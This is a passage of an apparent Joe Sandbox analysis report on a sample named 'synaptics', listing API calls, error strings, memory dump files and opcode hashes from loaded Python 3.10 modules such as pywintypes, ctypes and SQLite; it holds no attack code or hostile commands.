                                                                                                                                                                                                              • Associated: 00000018.00000002.3096639269.000000006C0A0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096945165.000000006C0B0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097139467.000000006C0B5000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097249465.000000006C0B7000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0a0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: LongLong_SubtypeType_
                                                                                                                                                                                                              • String ID: one character bytes, bytearray or integer expected
                                                                                                                                                                                                              • API String ID: 3904634716-2748977362
                                                                                                                                                                                                              • Opcode ID: d8b15e6b5b15d5bb314adaff998d191fce075b405764ece2588f52b92c9c9a1e
                                                                                                                                                                                                              • Instruction ID: b4736b37a4d2433204cad812e84f90ff0efcb7c27e5b243c48e2370ba9836c3f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d8b15e6b5b15d5bb314adaff998d191fce075b405764ece2588f52b92c9c9a1e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B4117C30305781CFCB15CF99DA84BD63BF8EF06359B044456E88D87A22CB72E45ACB55
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • sqlite3_log.SQLITE3(0000000B,%s at line %d of [%.10s],database corruption,00011EB8,df5c253c0b3dd24916e4ec7cf77d3db5294cc9fd45ae7b9c5e82ad8197f38a24,?,00000000,?,6C0F0B16), ref: 6C0DFD0A
                                                                                                                                                                                                                • Part of subcall function 6C0DC360: sqlite3_log.SQLITE3(0000000B,%s at line %d of [%.10s],database corruption,00011310,df5c253c0b3dd24916e4ec7cf77d3db5294cc9fd45ae7b9c5e82ad8197f38a24,?,?,?,?,6C0F0B07), ref: 6C0DC392
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • %s at line %d of [%.10s], xrefs: 6C0DFD03
                                                                                                                                                                                                              • df5c253c0b3dd24916e4ec7cf77d3db5294cc9fd45ae7b9c5e82ad8197f38a24, xrefs: 6C0DFCF4
                                                                                                                                                                                                              • database corruption, xrefs: 6C0DFCFE
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3097566579.000000006C0C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 6C0C0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097364508.000000006C0C0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097763089.000000006C1C1000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097877844.000000006C1D7000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097988021.000000006C1DA000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0c0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: sqlite3_log
                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$database corruption$df5c253c0b3dd24916e4ec7cf77d3db5294cc9fd45ae7b9c5e82ad8197f38a24
                                                                                                                                                                                                              • API String ID: 632333372-2551159147
                                                                                                                                                                                                              • Opcode ID: 17f4c5479b9cbed5a4e1f7d712f977c52b1748e3130622c7f1e57a938628659f
                                                                                                                                                                                                              • Instruction ID: b433be420806caf8a55cab3dd621f3a580a4c6084a22ae5632ecc7a8205d6f84
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 17f4c5479b9cbed5a4e1f7d712f977c52b1748e3130622c7f1e57a938628659f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2911346A204B604AC324CF289880AB3B7F5AF19715B14455DEAD6C7B82E325F841C3A4
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ?PyWinObject_AsSYSTEMTIME@@YAHPAU_object@@PAU_SYSTEMTIME@@@Z.PYWINTYPES310(?,?), ref: 6BF481F2
                                                                                                                                                                                                                • Part of subcall function 6BF482E0: PyType_IsSubtype.PYTHON310(?,?,?,6BF481F7,?,?), ref: 6BF482F6
                                                                                                                                                                                                                • Part of subcall function 6BF482E0: PyErr_Format.PYTHON310(6C7E9584,must be a pywintypes time object (got %s),?), ref: 6BF48315
                                                                                                                                                                                                              • SystemTimeToVariantTime.OLEAUT32(?,?), ref: 6BF48214
                                                                                                                                                                                                              • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES310(SystemTimeToVariantTime,00000000), ref: 6BF48224
                                                                                                                                                                                                                • Part of subcall function 6BF4A230: GetLastError.KERNEL32(00000000,6BF46624,MakeSelfRelativeSD,00000000), ref: 6BF4A239
                                                                                                                                                                                                                • Part of subcall function 6BF4A230: FormatMessageW.KERNEL32(00001B00,00000000,6BF46624,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6BF4A29A
                                                                                                                                                                                                                • Part of subcall function 6BF4A230: PyUnicode_DecodeMBCS.PYTHON310(?,?,ignore,?,00000000), ref: 6BF4A370
                                                                                                                                                                                                                • Part of subcall function 6BF4A230: _Py_BuildValue_SizeT.PYTHON310((iNN),6BF46624,00000000,00000000,?,00000000), ref: 6BF4A37E
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • SystemTimeToVariantTime, xrefs: 6BF4821F
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FormatTimeU_object@@$BuildDecodeE@@@Err_ErrorError@@LastMessageObject_SizeSubtypeSystemType_Unicode_Value_VariantWin_
                                                                                                                                                                                                              • String ID: SystemTimeToVariantTime
                                                                                                                                                                                                              • API String ID: 3971647343-1826941993
                                                                                                                                                                                                              • Opcode ID: d6f463f206b9d7cd3f3e0cf2fb727df2dcbd88e32efc2a47763da31012a31b5a
                                                                                                                                                                                                              • Instruction ID: cc0c6ca8695ad37ab8314d7db61c538de99d30504bdd8902588706b1ec83a97f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d6f463f206b9d7cd3f3e0cf2fb727df2dcbd88e32efc2a47763da31012a31b5a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: CF110837A246055AC700DF74D81196BB7FCDF99218F00465EF849D3152FB34E64587D2
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyBuffer_Release.PYTHON310 ref: 6BF4AEC4
                                                                                                                                                                                                              • PyErr_SetString.PYTHON310(6C7E9584,Buffer cannot be None), ref: 6BF4AF06
                                                                                                                                                                                                              • PyObject_GetBuffer.PYTHON310(?,?,?), ref: 6BF4AF26
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: BufferBuffer_Err_Object_ReleaseString
                                                                                                                                                                                                              • String ID: Buffer cannot be None
                                                                                                                                                                                                              • API String ID: 1863399566-305949699
                                                                                                                                                                                                              • Opcode ID: 00a38089ee978fbc505c1193c8c66962c6c726988dcab407239929039c50a268
                                                                                                                                                                                                              • Instruction ID: 280a333900c93efca695386d22366c62bacdc8a646618627d9c3dd22dd94f132
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 00a38089ee978fbc505c1193c8c66962c6c726988dcab407239929039c50a268
                                                                                                                                                                                                              • Instruction Fuzzy Hash: EF11C472115612CBEB24DF14C504B9F7BE0DF15314F04C42DE46A87566C378D9A8C752
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyBytes_AsString.PYTHON310(?), ref: 6C0AD37D
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • bytes or integer address expected instead of %s instance, xrefs: 6C0AD3BA
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3096833178.000000006C0A1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 6C0A0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096639269.000000006C0A0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096945165.000000006C0B0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097139467.000000006C0B5000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097249465.000000006C0B7000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0a0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Bytes_String
                                                                                                                                                                                                              • String ID: bytes or integer address expected instead of %s instance
                                                                                                                                                                                                              • API String ID: 338066286-706233300
                                                                                                                                                                                                              • Opcode ID: 395295c2af9f66cbf598c017b9aac57ca58a018688fa5a7800d8b9bfe5d890c1
                                                                                                                                                                                                              • Instruction ID: 4c50afa120c70207452baf61825892593858a8e455905789317cf2f3c299f84e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 395295c2af9f66cbf598c017b9aac57ca58a018688fa5a7800d8b9bfe5d890c1
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E90188712042149FCB05DF98E940BE937F8FB4A769F108056E90E87211CB32A852CB84
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyLong_AsUnsignedLongMask.PYTHON310(?), ref: 6C0A4FE4
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • function name must be string, bytes object or integer, xrefs: 6C0A503A
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3096833178.000000006C0A1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 6C0A0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096639269.000000006C0A0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096945165.000000006C0B0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097139467.000000006C0B5000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097249465.000000006C0B7000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0a0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: LongLong_MaskUnsigned
                                                                                                                                                                                                              • String ID: function name must be string, bytes object or integer
                                                                                                                                                                                                              • API String ID: 2866502472-3177123413
                                                                                                                                                                                                              • Opcode ID: 9a0c147e1125ef871a1acd4092791cbddce1ab31d9b264ea66f837fcc24a087b
                                                                                                                                                                                                              • Instruction ID: 5e43d90f01f27b4b9092d2a0e6fba4e76fa4917689f942745ff792d20d75c35a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9a0c147e1125ef871a1acd4092791cbddce1ab31d9b264ea66f837fcc24a087b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2E01D1743102449BDB09CFA9D404BAA37E9EF45618F00C468FC0ECB761DB3BE851CA54
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PySys_Audit.PYTHON310(ctypes.cdata,6C0B0E70,00000000), ref: 6C0A4602
                                                                                                                                                                                                              • PyErr_SetString.PYTHON310(6C7E9584,abstract class), ref: 6C0A4663
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3096833178.000000006C0A1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 6C0A0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096639269.000000006C0A0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096945165.000000006C0B0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097139467.000000006C0B5000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097249465.000000006C0B7000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0a0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AuditErr_StringSys_
                                                                                                                                                                                                              • String ID: abstract class$ctypes.cdata
                                                                                                                                                                                                              • API String ID: 1384585920-3531133667
                                                                                                                                                                                                              • Opcode ID: 8372c92c8f2138ed7112d0f27d2557859bf81e2a7a2b0c292ddac6cf90a3b1db
                                                                                                                                                                                                              • Instruction ID: 84cd2bbe8dcec1894be81bd0f29e5d77e24e2edeff5560afe01f81705f6fd980
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8372c92c8f2138ed7112d0f27d2557859bf81e2a7a2b0c292ddac6cf90a3b1db
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5801F1B1604600AFD308CFD4CA40F86B7E8EF4471AF044529E41D97A21CB72E881CB92
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PySys_Audit.PYTHON310(ctypes.string_at,6C0B17B8,?,?), ref: 6C0A7C37
                                                                                                                                                                                                              • PyBytes_FromStringAndSize.PYTHON310(?,?), ref: 6C0A7C5F
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3096833178.000000006C0A1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 6C0A0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096639269.000000006C0A0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096945165.000000006C0B0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097139467.000000006C0B5000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097249465.000000006C0B7000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0a0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AuditBytes_FromSizeStringSys_
                                                                                                                                                                                                              • String ID: ctypes.string_at
                                                                                                                                                                                                              • API String ID: 1783689829-1910480597
                                                                                                                                                                                                              • Opcode ID: 16fd2ac49ebb0c0b81386e6cd6ab1e887cd9936c9f5a07a71ff77afd05f5b43e
                                                                                                                                                                                                              • Instruction ID: 0ed13da63d09af2d3d49c3a4f58152e784496e46d683775168a813f9b3338a8d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 16fd2ac49ebb0c0b81386e6cd6ab1e887cd9936c9f5a07a71ff77afd05f5b43e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 14F02B373440143B8B045ADDBC088FB3BBCD9C377EB044669FD1DC6501E623611682A0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PySys_Audit.PYTHON310(ctypes.get_errno,00000000), ref: 6C0A94AB
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3096833178.000000006C0A1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 6C0A0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096639269.000000006C0A0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096945165.000000006C0B0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097139467.000000006C0B5000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097249465.000000006C0B7000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0a0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AuditSys_
                                                                                                                                                                                                              • String ID: ctypes.get_errno
                                                                                                                                                                                                              • API String ID: 3932060086-2892954555
                                                                                                                                                                                                              • Opcode ID: 78a416b3d691adf7a59e29f9d9e915a6a4481e8bffd08246d88a8ef9f8ec1036
                                                                                                                                                                                                              • Instruction ID: 57a819be364cc70d31ef64a1ca0341e48cd03baa6a19fd933fc44651ebc4bd3f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 78a416b3d691adf7a59e29f9d9e915a6a4481e8bffd08246d88a8ef9f8ec1036
                                                                                                                                                                                                              • Instruction Fuzzy Hash: ACF0F672B080045BCA11C7EDAC05ADA73E8CB8223AF0403B5ED0DD2640EA239D2582E6
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PySys_Audit.PYTHON310(ctypes.get_last_error,00000000), ref: 6C0A958B
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3096833178.000000006C0A1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 6C0A0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096639269.000000006C0A0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096945165.000000006C0B0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097139467.000000006C0B5000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097249465.000000006C0B7000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0a0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AuditSys_
                                                                                                                                                                                                              • String ID: ctypes.get_last_error
                                                                                                                                                                                                              • API String ID: 3932060086-1232113872
                                                                                                                                                                                                              • Opcode ID: ec3f415d5dba0da210237a68379c7c21994b62306ddff243b04088c1c08d93c1
                                                                                                                                                                                                              • Instruction ID: d07181b9ced9cef6d0dad71469e4955fdec3455ee4f2d0125f67dad2c53c0404
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ec3f415d5dba0da210237a68379c7c21994b62306ddff243b04088c1c08d93c1
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1AF0F672B0800457CA10C7EEAD066CA73E8CB8223AF0803B5EE0DD6641EA239E2583D5
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • StringFromGUID2.OLE32(?,?,00000100), ref: 6BF44FC5
                                                                                                                                                                                                              • PyErr_SetString.PYTHON310(6C7E9C54,The string is too long,?,00000100), ref: 6BF44FDB
                                                                                                                                                                                                              • PyUnicode_FromWideChar.PYTHON310(00000100,-00000002,?,00000100), ref: 6BF45016
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FromString$CharErr_Unicode_Wide
                                                                                                                                                                                                              • String ID: The string is too long
                                                                                                                                                                                                              • API String ID: 1358704699-1150129668
                                                                                                                                                                                                              • Opcode ID: a8a4f4e51eb2401d138070c20b71153a9edf3138deaffcca1a6b3a7fffeecf60
                                                                                                                                                                                                              • Instruction ID: 6c15f2bd73815e5962e2a2fc13a48ad28c3b08d54b4c74664b346ff7d1c6b5d7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a8a4f4e51eb2401d138070c20b71153a9edf3138deaffcca1a6b3a7fffeecf60
                                                                                                                                                                                                              • Instruction Fuzzy Hash: AE01A7715241018FDB55EB28CC4ABDA3BE4EF58704F404858E5C5C7266FB74E158C742
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyArg_ParseTuple.PYTHON310(?,|O:HANDLERegistry,6C7F20B8), ref: 6BF44AD8
                                                                                                                                                                                                              • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES310(?,?), ref: 6BF44AEE
                                                                                                                                                                                                                • Part of subcall function 6BF4BDF7: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,6BF42282,0000000C), ref: 6BF4BE0C
                                                                                                                                                                                                              • _Py_NewReference.PYTHON310(00000004,00000010), ref: 6BF44B1A
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Arg_Object_ParseReferenceTupleU_object@@malloc
                                                                                                                                                                                                              • String ID: |O:HANDLERegistry
                                                                                                                                                                                                              • API String ID: 2420273072-3745035425
                                                                                                                                                                                                              • Opcode ID: 20f02395df779f5217a7704f0d9bb88e61fd0a72b2ff625a6a03f09381347cc9
                                                                                                                                                                                                              • Instruction ID: 0ba3625a55b25bfeb396a4844b780afd5799db0f617eaf9cded2e3d1cbdff801
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 20f02395df779f5217a7704f0d9bb88e61fd0a72b2ff625a6a03f09381347cc9
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D30186765146029BC700DF19FD01A9ABFE4FF94705F404839EC48D2262E738DA28CBA3
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyErr_SetString.PYTHON310(6C7E9584,cannot be converted to pointer), ref: 6C0AD5F8
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • cannot be converted to pointer, xrefs: 6C0AD5F1
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3096833178.000000006C0A1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 6C0A0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096639269.000000006C0A0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096945165.000000006C0B0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097139467.000000006C0B5000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097249465.000000006C0B7000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0a0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Err_String
                                                                                                                                                                                                              • String ID: cannot be converted to pointer
                                                                                                                                                                                                              • API String ID: 1450464846-3065012988
                                                                                                                                                                                                              • Opcode ID: d49bb133d5d5eee58b917edc2e2592424910e6e5c8296b793d7d6bf4f2dd9225
                                                                                                                                                                                                              • Instruction ID: bc34b1cd16b1581dc38aee1628bee438e6d75d62eaeff302be5939d392d5529f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d49bb133d5d5eee58b917edc2e2592424910e6e5c8296b793d7d6bf4f2dd9225
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4F0119717082459FCF08DFA8DA84A9537F8EB06769B044451F90D8B611DB32E915DB94
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyArg_ParseTuple.PYTHON310(?,|O:HANDLE,6C7F20B8), ref: 6BF44398
                                                                                                                                                                                                              • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES310(?,?), ref: 6BF443AE
                                                                                                                                                                                                                • Part of subcall function 6BF4BDF7: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,6BF42282,0000000C), ref: 6BF4BE0C
                                                                                                                                                                                                              • _Py_NewReference.PYTHON310(00000004,00000010), ref: 6BF443DA
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Arg_Object_ParseReferenceTupleU_object@@malloc
                                                                                                                                                                                                              • String ID: |O:HANDLE
                                                                                                                                                                                                              • API String ID: 2420273072-3700050126
                                                                                                                                                                                                              • Opcode ID: dba738d2400bfb7ac5cb42f64ee626a86711ad279f3d0cdade0fe22a8ba699a8
                                                                                                                                                                                                              • Instruction ID: 41f1841fd04316cb081a0b1394c71d443f9723d8d5801e787b237cb1977d57a0
                                                                                                                                                                                                              • Opcode Fuzzy Hash: dba738d2400bfb7ac5cb42f64ee626a86711ad279f3d0cdade0fe22a8ba699a8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5A0136765142029BC700DF25FD41A6ABFE4FF84745F404839ED48D2262E739D929DBA3
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyArg_ParseTuple.PYTHON310(?,O&O!,Function_0000A870,?,?), ref: 6C0AABA1
                                                                                                                                                                                                              • PySys_Audit.PYTHON310(ctypes.call_function,6C0B2794,?,?), ref: 6C0AABBE
